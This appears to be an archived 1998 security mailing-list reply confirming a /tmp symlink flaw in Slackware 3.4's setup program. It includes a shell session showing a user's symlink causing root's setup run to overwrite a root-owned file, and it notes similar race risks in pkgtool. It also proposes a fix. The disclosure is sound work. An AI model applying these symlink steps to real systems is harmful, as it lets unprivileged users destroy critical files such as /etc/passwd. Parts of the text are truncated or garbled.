Re: Security problem in Slackware.

Peter van Dijk (
Fri, 13 Mar 1998 16:34:58 +0100

On Wed, 11 Mar 1998, Suman_Saraf wrote:

> Hi,
> I just found out that the setup program in slackware creates a file called
> hdtest in /tmp without checking for its existence.
> So a malicious user could just create a symlink to any root owned file and
> it will get fucked up when the administrator runs setup.
> In my case I just created a symlink to /etc/passwd and when I exit the
> setup the file contains only "EXIT" :-)
> Lemme know if something has been done about it already.
I have Slackware 3.4 (the newest) and I've been following the ChangeLog on It only lists a fix for a bug I submitted (imapd/ipop3d

[root@koek] /tmp# nd test
[root@koek] /tmp/test# echo "root owns this file" > rootfile
[root@koek] /tmp/test# cat rootfile
root owns this file
[root@koek] /tmp/test# ls -al rootfile
-rw-r--r-- 1 root root 20 Mar 13 16:21 rootfile

[peter@koek] /tmp$ ln -sf test/rootfile hdset

[root@koek] /tmp/test# setup

[peter@koek] /tmp$ ls -al test/rootfile
-rw-r--r-- 1 root root 4 Mar 13 16:23 test/rootfile
[peter@koek] /tmp$ cat test/rootfile
EXIT[peter@koek] /tmp$

So, it does still work.
Another thing that might be interesting are the /tmp/SeT* files.
setup creates them while running (starting with rm -f /tmp/Set*). But
while setup is running you should be able to create some symlinks, like
some kind of race. Only this time, you're racing a human ;)

Another file that can be exploited is /tmp/slackdir, which records which
directory should be the root of the slackware filesystem. Very unlikely to
be used, but worth noting.

pkgtool does things like this in:
and all kinds of /tmp/SeT* (which it cleans up when starting, like setup

The best fix for this would be to let all these programs use their own
tmp-dir, because they're going to be run as root anyway.

Greetz, Peter.

'Selfishness and separation have led me to . Peter 'Hardbeat' van Dijk
to believe that the world is not my problem . network security consultant
I am the world. And you are the world.' . (yeah, right...)
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